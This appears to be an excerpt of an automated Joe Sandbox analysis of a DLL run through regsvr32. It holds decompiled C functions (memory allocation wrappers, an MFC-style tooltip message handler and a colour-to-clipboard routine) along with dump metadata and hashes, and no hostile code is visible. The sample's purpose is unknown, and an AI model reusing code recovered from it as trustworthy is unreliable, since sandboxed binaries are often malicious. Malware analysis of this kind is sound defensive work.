                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3276244213-0
                                                                                                                • Opcode ID: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
                                                                                                                • Instruction ID: 14c789b520978ccb89d4cdf03b6d23a9df2590e4dd267fbcd28f0b27d1ba4d1f
                                                                                                                • Opcode Fuzzy Hash: 30728fd0b73de8e9593f588b56ecaf7ae26a14441270695ef39d91977627781b
                                                                                                                • Instruction Fuzzy Hash: 3FA00269BD470461F8A0D1502C43F5821415764F01FE40060FB0CAC1C1A4C63298405B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001186 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 172 10001186-10006066 VirtualAlloc
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10001186(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}




                                                                                                                0x10006060
                                                                                                                0x10006066

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 10006060
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
                                                                                                                • Instruction ID: 01b1a425d789cbdabc9439a8440992a441d7e150583865e39de4930a53530a10
                                                                                                                • Opcode Fuzzy Hash: 337bfef5fbb8ec1e80fc560bc03efe550ee3042e26fca0366982ee7275b36580
                                                                                                                • Instruction Fuzzy Hash: 6BC00836458796EBDF12DF90CD44A6FBBA2FB88745F280D5CF6A251074C7229428EF06
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100011BD Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 174 100011bd-1000607e VirtualFree
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100011BD(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}




                                                                                                                0x10006078
                                                                                                                0x1000607e

                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 10006078
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
                                                                                                                • Instruction ID: ab04b333b1ee95674dc45df974ef924abd0ea2dd43eb25ff2de0b1c206d9cb0b
                                                                                                                • Opcode Fuzzy Hash: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
                                                                                                                • Instruction Fuzzy Hash: D1B00239458214FFEF126B50DD4494FBFA2FB88365F20C958F5AA51035C7328420EB02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 100464D4 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100464D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E1004764D(0x10091aa8, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E1001E375(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E10013FEA(_t163, _t165, _t204);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								_t115 = E10014305(_t200);
								__eflags = _t164;
								 *(_t204 - 0x14) = _t115;
								if(__eflags == 0) {
									L19:
									_t116 = E10009F14(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									__eflags = _t116;
									 *(_t204 - 4) = 0;
									if(__eflags != 0) {
										_t164 = E10045F69(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x134))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E10049170(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E10049170(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x28;
										_t109 =  *((intOrPtr*)( *_t200 + 0x6c))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										__eflags =  *(_t192 + 0x44) - _t109;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x28;
													if( *_t131 >= 0x28) {
														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
													}
												}
												__eflags =  *(_t192 + 0x48);
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E10009F14(__eflags, 0x30);
													E10049170(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E100470E9(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											 *(_t204 - 0x84) = _t139;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = E10016A68(_t164,  *(_t204 - 0x10), 0x400);
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E100155FD(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E10047725(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E10013FEA(_t163, _t165, _t204);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = E100129EF(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}


























                                                                                                                0x100464d4
                                                                                                                0x100464d4
                                                                                                                0x100464db
                                                                                                                0x100464e0
                                                                                                                0x100464e2
                                                                                                                0x100464e5
                                                                                                                0x100464e8
                                                                                                                0x100464f1
                                                                                                                0x100464f4
                                                                                                                0x10046527
                                                                                                                0x10046814
                                                                                                                0x10046814
                                                                                                                0x00000000
                                                                                                                0x1004653a
                                                                                                                0x1004653c
                                                                                                                0x1004653e
                                                                                                                0x10046541
                                                                                                                0x00000000
                                                                                                                0x10046547
                                                                                                                0x10046547
                                                                                                                0x1004654c
                                                                                                                0x1004654e
                                                                                                                0x10046550
                                                                                                                0x10046567
                                                                                                                0x10046567
                                                                                                                0x1004656e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046555
                                                                                                                0x1004655b
                                                                                                                0x00000000
                                                                                                                0x1004655d
                                                                                                                0x10046566
                                                                                                                0x00000000
                                                                                                                0x10046566
                                                                                                                0x1004655b
                                                                                                                0x10046572
                                                                                                                0x10046588
                                                                                                                0x1004658d
                                                                                                                0x10046592
                                                                                                                0x10046594
                                                                                                                0x10046597
                                                                                                                0x100465be
                                                                                                                0x100465c0
                                                                                                                0x100465c6
                                                                                                                0x100465c9
                                                                                                                0x100465cb
                                                                                                                0x100465cd
                                                                                                                0x100465d0
                                                                                                                0x100465d9
                                                                                                                0x100465d9
                                                                                                                0x100465dd
                                                                                                                0x100465e8
                                                                                                                0x100465ee
                                                                                                                0x100465f0
                                                                                                                0x1004660c
                                                                                                                0x10046612
                                                                                                                0x10046615
                                                                                                                0x10046618
                                                                                                                0x10046623
                                                                                                                0x10046628
                                                                                                                0x10046634
                                                                                                                0x1004663e
                                                                                                                0x10046641
                                                                                                                0x1004664f
                                                                                                                0x10046656
                                                                                                                0x10046665
                                                                                                                0x1004666c
                                                                                                                0x10046674
                                                                                                                0x10046676
                                                                                                                0x10046678
                                                                                                                0x1004667b
                                                                                                                0x1004667e
                                                                                                                0x10046681
                                                                                                                0x100466d4
                                                                                                                0x100466d4
                                                                                                                0x100466d7
                                                                                                                0x10046809
                                                                                                                0x10046782
                                                                                                                0x10046786
                                                                                                                0x1004678b
                                                                                                                0x10046790
                                                                                                                0x10046792
                                                                                                                0x10046794
                                                                                                                0x10046797
                                                                                                                0x100467a3
                                                                                                                0x100467a3
                                                                                                                0x10046797
                                                                                                                0x100467a9
                                                                                                                0x100467af
                                                                                                                0x100467b5
                                                                                                                0x100467b8
                                                                                                                0x100467c5
                                                                                                                0x100467c8
                                                                                                                0x100467cd
                                                                                                                0x100467cd
                                                                                                                0x100467d5
                                                                                                                0x100467d6
                                                                                                                0x100467d9
                                                                                                                0x100467d9
                                                                                                                0x100467db
                                                                                                                0x100467db
                                                                                                                0x100467df
                                                                                                                0x100467e5
                                                                                                                0x100467e9
                                                                                                                0x100467ef
                                                                                                                0x100467f2
                                                                                                                0x100467f7
                                                                                                                0x100467e9
                                                                                                                0x00000000
                                                                                                                0x100467df
                                                                                                                0x100466e2
                                                                                                                0x100466ec
                                                                                                                0x100466ec
                                                                                                                0x100466ee
                                                                                                                0x100466f1
                                                                                                                0x100466fb
                                                                                                                0x100466fe
                                                                                                                0x10046704
                                                                                                                0x10046706
                                                                                                                0x10046706
                                                                                                                0x10046709
                                                                                                                0x10046709
                                                                                                                0x10046721
                                                                                                                0x10046727
                                                                                                                0x1004672e
                                                                                                                0x1004673c
                                                                                                                0x10046747
                                                                                                                0x1004674d
                                                                                                                0x10046750
                                                                                                                0x10046753
                                                                                                                0x10046766
                                                                                                                0x10046766
                                                                                                                0x10046779
                                                                                                                0x00000000
                                                                                                                0x10046730
                                                                                                                0x10046733
                                                                                                                0x10046738
                                                                                                                0x1004673a
                                                                                                                0x1004677f
                                                                                                                0x1004677f
                                                                                                                0x00000000
                                                                                                                0x1004677f
                                                                                                                0x00000000
                                                                                                                0x1004673a
                                                                                                                0x1004672e
                                                                                                                0x10046683
                                                                                                                0x10046686
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046688
                                                                                                                0x1004668e
                                                                                                                0x100466bd
                                                                                                                0x100466c0
                                                                                                                0x100466ca
                                                                                                                0x100466ca
                                                                                                                0x10046690
                                                                                                                0x10046694
                                                                                                                0x100466b2
                                                                                                                0x100466b2
                                                                                                                0x00000000
                                                                                                                0x100465f2
                                                                                                                0x100465f8
                                                                                                                0x00000000
                                                                                                                0x100465f8
                                                                                                                0x100465f0
                                                                                                                0x1004659b
                                                                                                                0x100465a0
                                                                                                                0x100465a3
                                                                                                                0x100465a9
                                                                                                                0x100465b2
                                                                                                                0x100465b5
                                                                                                                0x100465b5
                                                                                                                0x100465b7
                                                                                                                0x100465b7
                                                                                                                0x100465ba
                                                                                                                0x100465bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046574
                                                                                                                0x10046576
                                                                                                                0x1004657c
                                                                                                                0x1004657f
                                                                                                                0x1004657f
                                                                                                                0x00000000
                                                                                                                0x10046576
                                                                                                                0x10046572
                                                                                                                0x10046541
                                                                                                                0x10046817
                                                                                                                0x10046817
                                                                                                                0x10046817
                                                                                                                0x1004681d
                                                                                                                0x100468e2
                                                                                                                0x100468e7
                                                                                                                0x100468e7
                                                                                                                0x10046823
                                                                                                                0x1004683d
                                                                                                                0x1004683d
                                                                                                                0x10046842
                                                                                                                0x10046844
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046827
                                                                                                                0x10046829
                                                                                                                0x1004684e
                                                                                                                0x1004684e
                                                                                                                0x10046854
                                                                                                                0x1004685e
                                                                                                                0x10046864
                                                                                                                0x10046867
                                                                                                                0x1004686e
                                                                                                                0x1004686e
                                                                                                                0x10046870
                                                                                                                0x10046870
                                                                                                                0x10046876
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046878
                                                                                                                0x1004687a
                                                                                                                0x100468dc
                                                                                                                0x100468dd
                                                                                                                0x00000000
                                                                                                                0x100468dd
                                                                                                                0x1004687c
                                                                                                                0x10046882
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046884
                                                                                                                0x1004688a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004688c
                                                                                                                0x10046892
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046894
                                                                                                                0x1004689a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004689c
                                                                                                                0x100468a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468a4
                                                                                                                0x100468aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468ac
                                                                                                                0x100468b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468b4
                                                                                                                0x100468ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468bc
                                                                                                                0x100468c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468c4
                                                                                                                0x100468ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468cc
                                                                                                                0x100468d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468d4
                                                                                                                0x100468da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100468da
                                                                                                                0x10046869
                                                                                                                0x1004686b
                                                                                                                0x00000000
                                                                                                                0x1004686b
                                                                                                                0x10046856
                                                                                                                0x1004685c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004685c
                                                                                                                0x1004682b
                                                                                                                0x10046831
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004683c
                                                                                                                0x1004683c
                                                                                                                0x10046846
                                                                                                                0x10046848
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10046848

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2864161637-3887548279
                                                                                                                • Opcode ID: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
                                                                                                                • Instruction ID: 4716ce11059b1d6aff665851ae5c4938c3b5f43c6bbf43757ff83e482e918513
                                                                                                                • Opcode Fuzzy Hash: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
                                                                                                                • Instruction Fuzzy Hash: FAC18DB1A00616DBEB50CFA4CC85B9D77B5EF08750F214279E905EB1A1EB71A840CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000105A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93clipboardmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E1000105A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t30;
				int _t50;
				void* _t82;
				signed int _t85;
				void* _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t90;
				void* _t93;

				_t93 = __eflags;
				_t82 = __edx;
				_push(0x14);
				E1004764D(0x1008dad3, __ebx, __edi, __esi);
				_t88 = __ecx;
				_t30 = E10001041(__ecx + 0x148);
				_t65 = 0xff - _t30;
				 *((intOrPtr*)(_t90 - 0x14)) = 0xff - E10001041(__ecx + 0x250);
				 *((intOrPtr*)(_t90 - 0x18)) = 0xff - E10001041(__ecx + 0x2d4);
				_t85 = 0 << 0x00000008 | 0x000000ff - _t30 & 0x000000ff;
				L1000140B(_t90 - 0x1c, E100184C0());
				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
				_push(_t90 - 0x10);
				_push(_t85);
				_push(_t90 - 0x20);
				L100012F3(0xff - _t30, _t85, __ecx, _t93, __fp0);
				_push( *((intOrPtr*)(_t90 - 0x18)));
				_push( *((intOrPtr*)(_t90 - 0x14)));
				_push(0xff);
				_push(_t85);
				_push( *(_t90 - 0x10) >> 0x00000010 & 0x000000ff);
				_push( *(_t90 - 0xf) & 0x000000ff);
				_push( *(_t90 - 0x10) & 0x000000ff);
				_push( *((intOrPtr*)(_t90 - 0x20)));
				_push( *((intOrPtr*)(_t90 - 0x18)));
				 *(_t90 - 4) = 1;
				_push( *((intOrPtr*)(_t90 - 0x14)));
				L1000106E(_t90 - 0x1c, "RGB( %d, %d, %d );\t// similar to %s (whose exact value is RGB( %d, %d, %d )); COLORREF value is 0x%08X; web value is #%02X%02X%02X", _t65);
				_t50 = OpenClipboard( *(_t88 + 0x20));
				_t89 =  *((intOrPtr*)(_t90 - 0x1c));
				if(_t50 != 0) {
					EmptyClipboard();
